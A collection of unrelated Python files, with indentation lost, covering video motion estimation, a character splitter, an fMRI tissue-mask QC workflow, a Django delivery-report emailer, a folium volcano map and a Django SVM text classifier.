targetframe = targetframe.astype('uint16')
frameH, frameW = anchorframe.shape
newFrame, origin, direction= HBMA(targetframe, anchorframe, 16,3)
cv2.imshow('new frame', newFrame)
cv2.waitKey(0)
cv2.destroyWindow('new frame') |
def all_digits(text):
digits = ''
for char in text:
if char.isdigit():
digits += char
return digits
def all_letters(text):
letters = ""
for char in text:
if char.isalpha():
letters += char
return letters
def all_other_characters(text):
other = ''
for char in text:
if not char.isdigit() and not char.isalpha():
other += char
return other
text = input()
print(all_digits(text))
print(all_letters(text))
print(all_other_characters(text))
|
from confounds import wf_tissue_priors as tp
from confounds import wf_get_masks as gm
from nipype.interfaces.fsl import (FLIRT, FAST, ConvertXFM, ImageMaths, MultiImageMaths)
import nibabel as nib
import numpy as np
from nipype.pipeline import Node, Workflow
from nipype.interfaces.utility import IdentityInterface, Function
# Main Workflow that connects two workflows
def get_wf_main(name='wf_main'):
wf_main = Workflow(name=name)
inputspec = Node(IdentityInterface(fields=['resampled_anat_file_path',
'func2anat_mat_path', 'reference_func_file_path',
'csf_tissue_prior_path', 'wm_tissue_prior_path',
'threshold', 'std2func_mat_path', 'brain_mask_eroded']),
name="inputspec")
outputspec = Node(IdentityInterface(fields=['csf_tissue_prior_path', 'wm_tissue_prior_path', 'qc_stats_dict']),
name="outputspec")
tissue_priors = tp.get_wf_tissue_priors(name='wf_tissue_priors')
tissue_masks = gm.get_wf_tissue_masks(name='wf_tissue_masks')
def compute_qc_stats(anat_file_path, csf_mask, csf_prior, wm_mask, wm_prior):
import numpy as np
import nibabel as nib
from collections import OrderedDict as od
# print('$$$$$$$$$$$$Inside$$$$$$$$$QCFUNC')
csf_prior_data = nib.load(csf_prior).get_data()
wm_prior_data = nib.load(wm_prior).get_data()
csf_mask_data = nib.load(csf_mask).get_data()
wm_mask_data = nib.load(wm_mask).get_data()
# A
voxels_count_csf_prior = len((np.where(csf_prior_data == 1))[0])
voxels_count_wm_prior = len((np.where(wm_prior_data == 1))[0])
# B
voxels_count_csf_mask = len((np.where(csf_mask_data == 1))[0])
voxels_count_wm_mask = len((np.where(wm_mask_data == 1))[0])
# A - B
A_minus_B_csf = len(np.where((csf_prior_data - csf_mask_data) == 1)[0])
A_minus_B_wm = len(np.where((wm_prior_data - wm_mask_data) == 1)[0])
# B - A
B_minus_A_csf = len(np.where((csf_prior_data - csf_mask_data) == -1)[0])
B_minus_A_wm = len(np.where((wm_prior_data - wm_mask_data) == -1)[0])
# A U B
A_union_B_csf = len(np.where((csf_prior_data + csf_mask_data) != 0)[0])
A_union_B_wm = len(np.where((wm_prior_data + wm_mask_data) != 0)[0])
# A I B
A_intersection_B_csf = len(np.where((csf_prior_data * csf_mask_data) == 1)[0])
A_intersection_B_wm = len(np.where((wm_prior_data * wm_mask_data) == 1)[0])
print('voxels_count_csf_prior ',voxels_count_csf_prior)
print('voxels_count_wm_prior ',voxels_count_wm_prior)
print('voxels_count_csf_mask ',voxels_count_csf_mask)
print('voxels_count_wm_mask ',voxels_count_wm_mask)
print('prior_minus_mask_csf ',A_minus_B_csf)
print('prior_minus_mask_wm ',A_minus_B_wm)
print('mask_minus_prior_csf ',B_minus_A_csf)
print('mask_minus_prior_wm ',B_minus_A_wm)
print('prior_union_mask_csf ',A_union_B_csf)
print('prior_union_mask_wm ',A_union_B_wm)
print('prior_intersection_mask_csf ',A_intersection_B_csf)
print('prior_intersection_mask_wm ',A_intersection_B_wm)
quality_csf = A_intersection_B_csf/A_union_B_csf
quality_wm = A_intersection_B_wm/A_union_B_wm
print('quality_csf ',quality_csf)
print('quality_wm ',quality_wm)
# A : Prior and B :Mask
print('Anat File path ',anat_file_path)
sub_id = anat_file_path.split('/')[-1].split('_')[0].split('-')[1]
print('Sub ID ',sub_id)
dict = od()
dict['sub_id'] = [sub_id]
dict['voxels_count_csf_prior'] = [voxels_count_csf_prior]
dict['voxels_count_wm_prior'] = [voxels_count_wm_prior]
dict['voxels_count_csf_mask'] = [voxels_count_csf_mask]
dict['voxels_count_wm_mask'] = [voxels_count_wm_mask]
dict['prior_minus_mask_csf'] = [A_minus_B_csf]
dict['prior_minus_mask_wm'] = [A_minus_B_wm]
dict['mask_minus_prior_csf'] = [B_minus_A_csf]
dict['mask_minus_prior_wm'] = [B_minus_A_wm]
dict['prior_union_mask_csf'] = [A_union_B_csf]
dict['prior_union_mask_wm'] = [A_union_B_wm]
dict['prior_intersection_mask_csf'] = [A_intersection_B_csf]
dict['prior_intersection_mask_wm'] = [A_intersection_B_wm]
dict['quality_csf'] = [quality_csf]
dict['quality_wm'] = [quality_wm]
return dict
qc_stats = Node(Function(function=compute_qc_stats, input_names=['anat_file_path',
'csf_mask','csf_prior','wm_mask', 'wm_prior'],
output_names=['dict']), name='qc_stats')
wf_main.connect(inputspec, 'csf_tissue_prior_path',tissue_priors,'inputspec.csf_tissue_prior_path')
wf_main.connect(inputspec, 'wm_tissue_prior_path',tissue_priors,'inputspec.wm_tissue_prior_path')
wf_main.connect(inputspec, 'threshold',tissue_priors,'inputspec.threshold')
wf_main.connect(inputspec, 'reference_func_file_path',tissue_priors,'inputspec.reference_func_file_path')
wf_main.connect(inputspec, 'std2func_mat_path',tissue_priors,'inputspec.std2func_mat_path')
wf_main.connect(tissue_priors, 'outputspec.csf_tissue_prior_path',outputspec,'csf_tissue_prior_path')
wf_main.connect(tissue_priors, 'outputspec.wm_tissue_prior_path',outputspec,'wm_tissue_prior_path')
wf_main.connect(inputspec, 'resampled_anat_file_path',tissue_masks,'inputspec.resampled_anat_file_path')
wf_main.connect(inputspec, 'reference_func_file_path',tissue_masks,'inputspec.reference_func_file_path')
wf_main.connect(inputspec, 'func2anat_mat_path',tissue_masks,'inputspec.func2anat_mat_path')
wf_main.connect(inputspec, 'std2func_mat_path',tissue_masks,'inputspec.std2func_mat_path')
wf_main.connect(inputspec, 'brain_mask_eroded',tissue_masks,'inputspec.brain_mask_eroded')
wf_main.connect(inputspec, 'threshold',tissue_masks,'inputspec.threshold')
# wf_main.connect(tissue_masks, 'outputspec.csf_mask', outputspec,'csf_mask')
# wf_main.connect(tissue_masks, 'outputspec.wm_mask', outputspec,'wm_mask')
wf_main.connect(tissue_priors, 'outputspec.csf_tissue_prior_path',qc_stats,'csf_prior')
wf_main.connect(tissue_priors, 'outputspec.wm_tissue_prior_path',qc_stats,'wm_prior')
wf_main.connect(tissue_masks, 'outputspec.csf_mask', qc_stats,'csf_mask')
wf_main.connect(tissue_masks, 'outputspec.wm_mask', qc_stats,'wm_mask')
wf_main.connect(inputspec, 'resampled_anat_file_path', qc_stats, 'anat_file_path')
wf_main.connect(qc_stats, 'dict', outputspec, 'qc_stats_dict')
return wf_main
# --------------------------------------------------------------------------------------------------------------
if __name__ == "__main__":
wf_main = get_wf_main(name='wf_main')
wf_main.inputs.inputspec.resampled_anat_file_path = \
'/mnt/project1/home1/varunk/fMRI/testScripts/_subject_id_0050002/resample_anat/sub-0050002_T1w_brain_resample.nii'
wf_main.inputs.inputspec.reference_func_file_path = \
'/mnt/project1/home1/varunk/fMRI/testScripts/func_subject_id_0050002/applyMask/sub-0050002_task-rest_run-1_bold_roi_st_mcf.nii_brain.nii.gz'
wf_main.inputs.inputspec.func2anat_mat_path = \
'/mnt/project1/home1/varunk/fMRI/results/resultsABIDE1/preprocess/'+\
'motion_correction_bet/coreg_reg/_subject_id_0050002/func2anat_reg/'+\
'sub-0050002_task-rest_run-1_bold_roi_st_mcf_mean_bet_flirt.mat'
wf_main.inputs.inputspec.std2func_mat_path = \
'/mnt/project1/home1/varunk/fMRI/results/resultsABIDE1/preprocess/'+\
'motion_correction_bet/coreg_reg/atlas_resize_reg_directory/_subject_id_0050002/'+\
'std2func_xform/fullbrain_atlas_thr0-2mm_resample_flirt.mat'
# wf_tissue_masks.inputs.inputspec.tissue_prior_csf_path = '/mnt/project1/home1/varunk/fMRI/testScripts/results/wf_tissue_priors/threshold_csf/avg152T1_csf_resample_thresh.nii.gz'
# wf_tissue_masks.inputs.inputspec.tissue_prior_wm_path = '/mnt/project1/home1/varunk/fMRI/testScripts/results/wf_tissue_priors/threshold_wm/avg152T1_white_resample_thresh.nii.gz'
wf_main.inputs.inputspec.brain_mask_eroded = \
'/mnt/project1/home1/varunk/fMRI/Autism-Connectome-Analysis/tissuepriors/brain_mask_2mm_eroded_18mm.nii.gz'
wf_main.inputs.inputspec.threshold = 0.5
wf_main.inputs.inputspec.csf_tissue_prior_path =\
'/mnt/project1/home1/varunk/fMRI/Autism-Connectome-Analysis/tissuepriors/avg152T1_csf.nii.gz'
wf_main.inputs.inputspec.wm_tissue_prior_path =\
'/mnt/project1/home1/varunk/fMRI/Autism-Connectome-Analysis/tissuepriors/avg152T1_white.nii.gz'
wf_main.base_dir = 'results/'
TEMP_DIR_FOR_STORAGE = 'crash_files/'
wf_main.config = {"execution": {"crashdump_dir": TEMP_DIR_FOR_STORAGE}}
wf_main.write_graph(graph2use='flat', format='png', simple_form=True)
out = wf_main.run()
|
# coding=utf-8
from django.core.management.base import BaseCommand, CommandError
from deliver import send_email
from mulan.models import Contact, OrderHistory, Setting
import datetime as dt
import re
import sms24x7
def pp (p):
if type(p) is tuple:
return unicode (p[0]) + u" (" + unicode(p[1]) + u"%)"
else:
if p == 0:
return u"-"
else:
return unicode(p)
def generate_delivery_report_plain(orders):
return u"Ваш почтовый клиент не поддерживает HTML-форматирование! Смените его!"
def generate_delivery_report_html(orders, period):
orders_menu = [order for order in orders if order.is_menu_order()]
orders_bl = [order for order in orders if order.is_bl_order()]
orders_combined = [order for order in orders if order.is_combined_order()]
orders_count = orders.count()
orders_menu_count = len(orders_menu)
orders_bl_count = len(orders_bl)
orders_combined_count = len(orders_combined)
orders_regular_guests = 0
orders_menu_regular_guests = 0
orders_bl_regular_guests = 0
orders_combined_regular_guests =0
orders_occasional_visitors = 0
orders_menu_occasional_visitors = 0
orders_bl_occasional_visitors = 0
orders_combined_occasional_visitors = 0
orders_map = {}
for order in orders:
if order.is_menu_order():
type_order = 'menu'
elif order.is_bl_order():
type_order = 'bl'
else:
type_order = 'combined'
p = re.compile('[^+\d]')
p2 = re.compile('^\+')
guest_uid = p2.sub('8', p.sub('', order.original_order.phoneNo))
if orders_map.has_key(guest_uid):
val = orders_map[guest_uid]
else:
val = {'total':0, 'menu':0, 'bl':0, 'combined':0}
val['total'] = val['total'] + 1
val[type_order] = val[type_order] + 1
orders_map[guest_uid] = val
for guest_uid in orders_map.keys():
if orders_map[guest_uid]['total'] > 1:
orders_regular_guests += orders_map[guest_uid]['total']
else:
orders_occasional_visitors += orders_map[guest_uid]['total']
if orders_map[guest_uid]['total'] > 1:
orders_menu_regular_guests += orders_map[guest_uid]['menu']
else:
orders_menu_occasional_visitors += orders_map[guest_uid]['menu']
if orders_map[guest_uid]['total'] > 1:
orders_bl_regular_guests += orders_map[guest_uid]['bl']
else:
orders_bl_occasional_visitors += orders_map[guest_uid]['bl']
if orders_map[guest_uid]['total'] > 1:
orders_combined_regular_guests += orders_map[guest_uid]['combined']
else:
orders_combined_occasional_visitors += orders_map[guest_uid]['combined']
if orders_regular_guests > 0:
orders_regular_guests = (orders_regular_guests, int(round(float(orders_regular_guests) / orders_count * 100)))
if orders_menu_regular_guests > 0:
orders_menu_regular_guests = (orders_menu_regular_guests, int(round(float(orders_menu_regular_guests) / orders_menu_count * 100)))
if orders_bl_regular_guests > 0:
orders_bl_regular_guests = (orders_bl_regular_guests, int(round(float(orders_bl_regular_guests) / orders_bl_count * 100)))
if orders_combined_regular_guests > 0:
orders_combined_regular_guests = (orders_combined_regular_guests, int(round(float(orders_combined_regular_guests) / orders_combined_count * 100)))
if orders_occasional_visitors > 0:
orders_occasional_visitors = (orders_occasional_visitors, int(round(float(orders_occasional_visitors) / orders_count * 100)))
if orders_menu_occasional_visitors > 0:
orders_menu_occasional_visitors = (orders_menu_occasional_visitors, int(round(float(orders_menu_occasional_visitors) / orders_menu_count * 100)))
if orders_bl_occasional_visitors > 0:
orders_bl_occasional_visitors = (orders_bl_occasional_visitors, int(round(float(orders_bl_occasional_visitors) / orders_bl_count * 100)))
if orders_combined_occasional_visitors > 0:
orders_combined_occasional_visitors = (orders_combined_occasional_visitors, int(round(float(orders_combined_occasional_visitors) / orders_combined_count * 100)))
orders_money = sum([o.money for o in orders])
orders_menu_money = sum([o.money for o in orders_menu])
orders_bl_money = sum([o.money for o in orders_bl])
orders_combined_money = sum([o.money for o in orders_combined])
orders_positions = sum([o.calc_positions() for o in orders])
orders_menu_positions = sum([o.calc_positions() for o in orders_menu])
orders_bl_positions = sum([o.calc_positions() for o in orders_bl])
orders_combined_positions = sum([o.calc_positions() for o in orders_combined])
orders_money_avg = int(round(float(orders_money) / orders_count)) if orders_count > 0 else 0
orders_menu_money_avg = int(round(float(orders_menu_money) / orders_menu_count)) if orders_menu_count > 0 else 0
orders_bl_money_avg = int(round(float(orders_bl_money) / orders_bl_count)) if orders_bl_count > 0 else 0
orders_combined_money_avg = int(round(float(orders_combined_money) / orders_combined_count)) if orders_combined_count > 0 else 0
orders_positions_avg = round(float(orders_positions) / orders_count, 2) if orders_count > 0 else 0
orders_menu_positions_avg = round(float(orders_menu_positions) / orders_menu_count, 2) if orders_menu_count > 0 else 0
orders_bl_positions_avg = round(float(orders_bl_positions) / orders_bl_count, 2) if orders_bl_count > 0 else 0
orders_combined_positions_avg = round(float(orders_combined_positions) / orders_combined_count, 2) if orders_combined_count > 0 else 0
period_start = period[0]
period_end = period[1]
days = (period_end - period_start).days + 1
orders_avg_per_day = round(float(orders_count) / days, 2)
orders_menu_avg_per_day = round(float(orders_menu_count) / days, 2)
orders_bl_avg_per_day = round(float(orders_bl_count) / days, 2)
orders_combined_avg_per_day = round(float(orders_combined_count) / days, 2)
orders_max_per_day = 0
orders_menu_max_per_day = 0
orders_bl_max_per_day = 0
orders_combined_max_per_day = 0
orders_map = {}
for order in orders:
if order.is_menu_order():
type_order = 'menu'
elif order.is_bl_order():
type_order = 'bl'
else:
type_order = 'combined'
uid = order.created.date()
if orders_map.has_key(uid):
val = orders_map[uid]
else:
val = {'total':0, 'menu':0, 'bl':0, 'combined':0}
val['total'] = val['total'] + 1
val[type_order] = val[type_order] + 1
orders_map[uid] = val
for uid in orders_map.keys():
if orders_map[uid]['total'] > orders_max_per_day:
orders_max_per_day = orders_map[uid]['total']
if orders_map[uid]['menu'] > orders_menu_max_per_day:
orders_menu_max_per_day = orders_map[uid]['menu']
if orders_map[uid]['bl'] > orders_bl_max_per_day:
orders_bl_max_per_day = orders_map[uid]['bl']
if orders_map[uid]['combined'] > orders_combined_max_per_day:
orders_combined_max_per_day = orders_map[uid]['combined']
days_correct_ending = u"дней"
if (days % 10) == 1 and not days == 11:
days_correct_ending = u"день"
if (days % 10) in [2, 3, 4] and not days in [12, 13, 14]:
days_correct_ending = u"дня"
preface = (u"<h3> Уважаемый господин/уважаемая госпожа, </h3>" +
u"<p>вот отчёт о работе доставки с сайта за период с <b>" +
unicode (period_start) + u'</b> по <b>' + unicode (period_end) + u'</b> ('+ unicode(days) + u' ' + days_correct_ending + u'):</p>')
table_style = u'style="border: 1px solid;padding: 5px;"'
balance = None
try:
smsapi = sms24x7.smsapi(Setting.objects.get (key = 'email_address').value.encode('utf-8'),
Setting.objects.get (key = 'sms24x7_password').value.encode('utf-8'))
smsapi.login()
balance = smsapi.balance()
except Exception as e:
pass
return preface + (u"<table %table_style%>" +
u'<thead>' +
u'<tr>' +
u'<th %table_style%></th>' +
u'<th %table_style%>Все заказы</th>' +
u'<th %table_style%>Заказы по меню</th>' +
u'<th %table_style%>Заказы <nobr>бизнес-ланчей</nobr></th>' +
u'<th %table_style%>Заказы комбинированные</th>' +
u'</tr>'+
u'</thead>' +
u'<tbody>' +
u'<tr>' +
u'<td %table_style%><b>Количество заказов:</b></td>' +
u'<td %table_style%'+ u' align="center">' + pp(orders_count) + '</td>' +
u'<td %table_style%'+ u' align="center">' + pp(orders_menu_count) + '</td>'
u'<td %table_style%'+ u' align="center">' + pp(orders_bl_count) + '</td>' +
u'<td %table_style%'+ u' align="center">' + pp(orders_combined_count) + '</td>' +
u'</tr>'+
u'<tr>' +
u'<td %table_style%><b>Количество заказов от постоянных гостей (% от всех заказов):</b></td>' +
u'<td %table_style%'+ u' align="center">' + pp(orders_regular_guests) + '</td>' +
u'<td %table_style%'+ u' align="center">' + pp( orders_menu_regular_guests) + '</td>'
u'<td %table_style%'+ u' align="center">' + pp(orders_bl_regular_guests) + '</td>' +
u'<td %table_style%'+ u' align="center">' + pp(orders_combined_regular_guests) + '</td>' +
u'</tr>'+
u'<tr>' +
u'<td %table_style%><b>Количество заказов от случайных посетителей (% от всех заказов:</b></td>' +
u'<td %table_style%'+ u' align="center">' + pp(orders_occasional_visitors) + '</td>' +
u'<td %table_style%'+ u' align="center">' + pp(orders_menu_occasional_visitors) + '</td>'
u'<td %table_style%'+ u' align="center">' + pp(orders_bl_occasional_visitors) + '</td>' +
u'<td %table_style%'+ u' align="center">' + pp(orders_combined_occasional_visitors) + '</td>' +
u'</tr>'+
u'<tr>' +
u'<td %table_style%><b>Получено денег от клиентов:</b></td>' +
u'<td %table_style%'+ u' align="center">' + pp(orders_money ) + '</td>' +
u'<td %table_style%'+ u' align="center">' + pp(orders_menu_money) + '</td>' +
u'<td %table_style%'+ u' align="center">' + pp(orders_bl_money) + '</td>' +
u'<td %table_style%'+ u' align="center">' + pp(orders_combined_money) + '</td>' +
u'</tr>'+
u'<tr>' +
u'<td %table_style%><b>Средняя стоимость заказа:</b></td>' +
u'<td %table_style%'+ u' align="center">' + pp(orders_money_avg) + '</td>' +
u'<td %table_style%'+ u' align="center">' + pp(orders_menu_money_avg) + '</td>' +
u'<td %table_style%'+ u' align="center">' + pp(orders_bl_money_avg) + '</td>' +
u'<td %table_style%'+ u' align="center">' + pp(orders_combined_money_avg) + '</td>' +
u'</tr>'+
u'<tr>' +
u'<td %table_style%><b>Среднее количество позиций в заказе:</b></td>' +
u'<td %table_style%'+ u' align="center">' + pp(orders_positions_avg) + '</td>' +
u'<td %table_style%'+ u' align="center">' + pp(orders_menu_positions_avg) + '</td>' +
u'<td %table_style%'+ u' align="center">' + pp(orders_bl_positions_avg) + '</td>' +
u'<td %table_style%'+ u' align="center">' + pp(orders_combined_positions_avg) + '</td>' +
u'</tr>'+
u'<tr>' +
u'<td %table_style%><b>Среднее число заказов в день:</b></td>' +
u'<td %table_style%'+ u' align="center">' + pp(orders_avg_per_day) + '</td>' +
u'<td %table_style%'+ u' align="center">' + pp(orders_menu_avg_per_day) + '</td>' +
u'<td %table_style%'+ u' align="center">' + pp(orders_bl_avg_per_day) + '</td>' +
u'<td %table_style%'+ u' align="center">' + pp(orders_combined_avg_per_day) + '</td>' +
u'</tr>'+
u'<tr>' +
u'<td %table_style%><b>Максимальное число заказов в день:</b></td>' +
u'<td %table_style%'+ u' align="center">' + pp(orders_max_per_day) + '</td>' +
u'<td %table_style%'+ u' align="center">' + pp(orders_menu_max_per_day) + '</td>' +
u'<td %table_style%'+ u' align="center">' + pp(orders_bl_max_per_day) + '</td>' +
u'<td %table_style%'+ u' align="center">' + pp(orders_combined_max_per_day) + '</td>' +
u'</tr>'+
u'<tbody>' +
u"</table>" +
(u"<p>Также сообщаем,что в настоящее время ваш баланс на сайте sms24x7.ru составляет <b>" + balance + u'</b></p>' if balance else '')
).replace (u'%table_style%', table_style)
def get_prev_month_end (date):
this_month = date.month
while this_month == date.month:
date = date - dt.timedelta (days = 1)
return date
def get_this_month_start(date):
return date.replace (day = 1 )
def get_this_year_start(date):
return date.replace (month = 1, day = 1 )
class Command(BaseCommand):
def handle(self, *args, **options):
if len(args)!= 1 or args[0].upper() not in ['Y', 'M']:
raise CommandError ("You must specify type of report: Y or M")
period_end = get_prev_month_end (dt.date.today())
if args[0].upper() == 'Y':
period_start = get_this_year_start (period_end)
else:
period_start = get_this_month_start (period_end)
#print period_start, period_end
orders = OrderHistory.objects.filter (created__gte = period_start).filter(created__lte = period_end).order_by ('created')
if orders.count() > 0 and orders[0].created.date() > period_start and args[0].upper() == 'Y':
period_start = orders[0].created.date()
for contact in Contact.objects.all():
if '@' in contact.contact_detail:
report_plain = generate_delivery_report_plain(orders)
report_html = generate_delivery_report_html(orders, [period_start, period_end])
send_email(u'Отчёт о работе доставки с сайта за период с ' + unicode (period_start) + u' по ' + unicode (period_end) + u'.',
report_plain,
report_html,
contact.contact_detail)
|
#Note to reader: I'm sorry
import pandas
import folium
import numpy as np
#html for the popups
html = """
<head>
<h4 style="margin-bottom:0px; padding-top:10px;">Volcano information:</h4>
<p>
Name: %s <br>
Type: %s <br>
Elevation: %s meters<br>
</p>
</head>
<style>
* {
font-family:Helvetica;
font-size:16;
}
</style>"""
data = pandas.read_csv("Volcanoes2.csv") #Opens the csv and sets it to the data variable
lat = list(data["LAT"])
lon = list(data["LON"])
names = list(data["Name"])
volc = list(data["Type"])
elev = list(data["Elevation"]) #Sets each variable to a list of all the points in a given column
def colorelev(elev): #For later, returns a color based on the value of the elevation
if elev <0:
return "darkblue"
if elev <=1000:
return "green"
elif elev <=2000:
return "blue"
elif elev <=3000:
return "purple"
elif elev <=4000:
return "orange"
elif elev <=6000:
return "red"
VolcanoMap = folium.Map(location=[39.38, -118.63], zoom_start = 4) #Creates the basemap
fgVolc = folium.FeatureGroup(name="Volcanoes") #Creates a feature group for the volcanoes
fgPop = folium.FeatureGroup(name="Population") #Creates a feature group for the population map
fgPop.add_child(folium.GeoJson(data=open('world.json', 'r', encoding="utf-8-sig").read(), #(2 lines) Creates popualation map using a GeoJson (Don't ask how this works)
style_function=lambda x: {'fillColor':'green' if x['properties']['POP2005'] < 10000000 else 'orange' if 10000000 <= x['properties']['POP2005'] < 20000000 else 'red'}))
for lat, lon, name, volc, elev in zip(lat, lon, names, volc, elev): #Creates the volcano map and adds it to the fgVolc feature group
iframe = folium.IFrame(html=html % (name, volc, elev), width=300, height=122)
fgVolc.add_child(folium.CircleMarker(location=[lat, lon], popup=folium.Popup(iframe), radius=7, fill=True, color='grey',
fill_opacity=0.7, fill_color=colorelev(elev)))
VolcanoMap.add_child(fgPop) #Adds population map to the final map
VolcanoMap.add_child(fgVolc) #Adds volcanoes to the final map
VolcanoMap.add_child(folium.LayerControl()) #Adds layer control, where you can toggle feature groups
VolcanoMap.save("VolcanoMap2.html") #Saves the map as an html file |
from django.shortcuts import render, redirect
# from django.http import HttpResponseRedirect
from sklearn import svm #method untuk pross perhitungan klasifikasi
from sklearn.feature_extraction.text import TfidfTransformer, CountVectorizer #method untuk menghitung tfidf dan vsm
from sklearn import metrics #method untuk pembentukan matriks 1x1, 2x2, 3x3, ...
from sklearn.metrics import accuracy_score #method perhitungan akurasi
from sklearn.model_selection import KFold #Method perhitungan K-Fold
from sklearn.model_selection import train_test_split
from Sastrawi.Stemmer.StemmerFactory import StemmerFactory
import matplotlib.pyplot as plt
# from django.http import HttpResponse
import io
import urllib, base64
import pandas as pd
import nltk
import os
import nltk.corpus
import numpy as np #scientific computing untuk array N-dimenesi
import re #re = regular expression
import warnings
warnings.filterwarnings('ignore')
# import csv
from django.shortcuts import render
import openpyxl
def index(request):
if "GET" == request.method:
return render(request, 'klasifikasi/index.html', {})
else:
excel_file = request.FILES["excel_file"]
# you may put validations here to check extension or file size
wb = openpyxl.load_workbook(excel_file)
# getting all sheets
sheets = wb.sheetnames
print(sheets)
# getting a particular sheet
worksheet = wb["Sheet1"]
print(worksheet)
# getting active sheet
active_sheet = wb.active
print(active_sheet)
# reading a cell
print(worksheet["A1"].value)
excel_data = list()
# iterating over the rows and
# getting value from each cell in row
for row in worksheet.iter_rows():
row_data = list()
for cell in row:
row_data.append(str(cell.value))
print(cell.value)
excel_data.append(row_data)
#CASE FOLDING + LOAD FILE DOKUMEN#
dataSet = []#inisialisasi dataSet untuk menyimpan dokumen teks yang telah di looping
for a in excel_data:#file dokumen yg akan di looping
string = a[0]
string = re.sub("[^a-zA-Z]", " ", string)#proses membuang karakter selain huruf diganti spasi/sub=substitusi(mereplace semua pola RE) excel_data = excel_data.lower()#proses menjadikan kalimat huruf kecil
string = string.lower()
dataSet.append(string)#proses memasukan/mengupdate kalimat2 kedalam dataSet
# print("Case Folding: \n", dataSet)
# # #LOAD FILE STOPWORDS#
stopword = []#inisialisasi dataSet untuk menyimpan dokumen teks
s = open("klasifikasi/templates/id.stopwords.txt", "r+")#proses membuka file
stop = s.read()#proses pembacaan file
stop = re.sub("[^a-zA-Z]", " ", stop)#proses membuang karakter selain huruf diganti spasi/sub=substitusi(mereplace semua pola RE)
stopword.append(stop)#proses memasukan/mengupdate kalimat2 kedalam stopword
s.close()#proses menutup file
# print("\nDaftar Stopword: \n", stopword)
# TOKENIZING DOKUMEN#
# range : berfungsi untuk mengembalikan deret integer berurut pada range yang ditentukan dari start sampai stop.
bagOfWords = dataSet#insialisasi bank kata(bag of word) yang isinya sama dengan variabel dataSet
for x in range(len(dataSet)):
# for x in excel_data:#file dokumen yg akan di looping
bagOfWords[x] = dataSet[x].split()#isi dari 'variabel dataSet' di pecah2 menjadi satuan kata lalu di copy ke sebuah variabel indeks ke-x
print("\nTokenizing: \n", bagOfWords)
# #TOKENIZING STOPWORDS#
stopwords = stopword#insialisasi bank kata(variabel stopwords) yang isinya sama dengan variabel stopword
for x in range(0,1):#file dokumen yg akan di looping
stopwords[x] = stopword[x].split()#isi dari 'variabel word' di pecah2 menjadi satuan kata lalu di copy ke sebuah variabel indeks ke-x
print("\nTokenizing Stopwords: \n", stopwords)
#FILTERING#
for x in range(len(dataSet)):#looping pada seluruh file dokumen abstrak
for y in range(0, len(bagOfWords[x])):#looping pada setiap kata per dokumen
for z in range(0, 780):#looping pada setiap kata stopwords
if(bagOfWords[x][y] == stopwords[0][z]):#proses membandingkan setiap kata per dokumen dgn setiap kata pada stopword
bagOfWords[x][y]=''#jika ditemukan kata yang tidak penting maka kata tsb dihapus
print("\nFiltering: \n", bagOfWords)
#KATA BERSIH/Mengembalikan kata2 yg sudah tidak ada kata yg 'tidak penting' menjadi kalimat utuh/dokumen#
for i in range(0, len(bagOfWords)):#looping untuk seluruh kata pada bank kata
bagOfWords[i] = filter(bool, bagOfWords[i])#menghapus kata yg kosong
dataSet[i] = ' '.join(bagOfWords[i])#menggabungkan kata demi kata dengan sebuah pemisah spasi per dokumen
print("\nKata Bersih: \n", dataSet)
# factory = StemmerFactory()
# stemmer = factory.create_stemmer()
# for i in range(0, len(bagOfWords)):#looping untuk seluruh kata pada bank kata
# output = stemmer.stem(str(bagOfWords))
# print("\nStemming : \n", output)
#VSM & TFIDF#
VSM = CountVectorizer().fit_transform(dataSet) #method vector space model dari library scikit learn melakukan perubahan menjadi sebuah vektor
#tfidf = TfidfTransformer() #method tfidf dari library scikit learn di copy ke variabel tfidf
TFIDF = TfidfTransformer().fit_transform(VSM) #method tfidf dari library scikit learn melakukan perubahan menjadi sebuah nilai
#print (CountVectorizer().vocabulary)
# print("\nVSM: \n", VSM)
print("\n", VSM.todense())
print("\nTFIDF: \n", TFIDF)
#hhprint(TFIDF.todense())
# #KONVERSI LABEL# Data Latih
# #Kimia = 0, Fisika = 1, Biologi = 2
# label_manual = excel_data
label = []
for a in excel_data:
label.append(a[1])
label_manual = np.array(label)
#METHOD MENGHITUNG RATA2 AKURASI
akurasi = []
def avg_akurasi():
# total = 0 ## pengosongan variabel
# for i in range(10): ## looping 10x karena ada 10 fold
# total = total + akurasi[i]
# rata2 = total / 10
# avg_akurasi = (total / 10)
print("-------------------------------------------------------------------------------------------------------")
print("Rata-rata akurasi keseluruhan adalah :", total / 10) ## cetak rata-rata akurasi
data_prediksi = []
data_uji = []
data_latih = []
kFoldCrossValidation = KFold(n_splits=10)#fungsi K-Fold Cross Validation melakukan insialisasi 10x iterasi
for latih, uji in kFoldCrossValidation.split(TFIDF, label_manual):
print("-----------------------------------------------------------------------")
print("Banyak Data Latih: ", len(latih))
print("Banyak Data Uji: ", len(uji))
print("\nData Latih: \n", latih)
print("\nData Uji: \n", uji)
dataLatih1, dataUji1 = TFIDF[latih], TFIDF[uji]#proses inisialisasi dari masing2 data latih/uji dijadikan nilai tfidf lalu di copy ke variabel dataLatih/Uji1
# label = []
# for a in excel_data:
# label.append(a[1])
# label_manual = np.array(label)
dataLatih2, dataUji2 = label_manual[latih], label_manual[uji]#proses inisialisasi dari masing2 data latih/uji dibentuk ke label untuk proses prediksi lalu di copy ke variabel dataLatih/Uji2
SVM = svm.SVC(kernel='linear').fit(dataLatih1, dataLatih2)#data latih melakukan proses pelatihan dengan algoritma SVM
prediksi = SVM.predict(dataUji1)#proses prediksi dari data latih yang sudah tersimpan sebagai model
print("\nHasil Prediksi: \n", prediksi)
print("\nConfusion Matrix: \n", metrics.confusion_matrix(dataUji2, prediksi))#proses pembetukan metriks
akurasi.append(accuracy_score(dataUji2, prediksi))
print("\nAkurasi: ", accuracy_score(dataUji2, prediksi))
print()
label = ['Kimia', 'Fisika', 'Biologi']
print(metrics.classification_report(dataUji2, prediksi, target_names=label))#proses pembentukan confusin matrix
data_uji.append(uji)
data_latih.append(latih)
data_prediksi.append(prediksi)
# metrics = metrics.classification_report(dataUji2, prediksi, target_names=label)
# avg_akurasi()
total = 0
for i in range(10): ## looping 10x karena ada 10 fold
total = total + akurasi[i]
rata2 = total / 10
np_prediksi = np.array(data_prediksi)
data_hist = np_prediksi.ravel()
plt.hist(data_hist)
fig = plt.gcf()
buf = io.BytesIO()
fig.savefig(buf,format='png')
buf.seek(0)
string = base64.b64encode(buf.read())
uri = urllib.parse.quote(string)
# data_loop = zip(data_uji, data_prediksi)
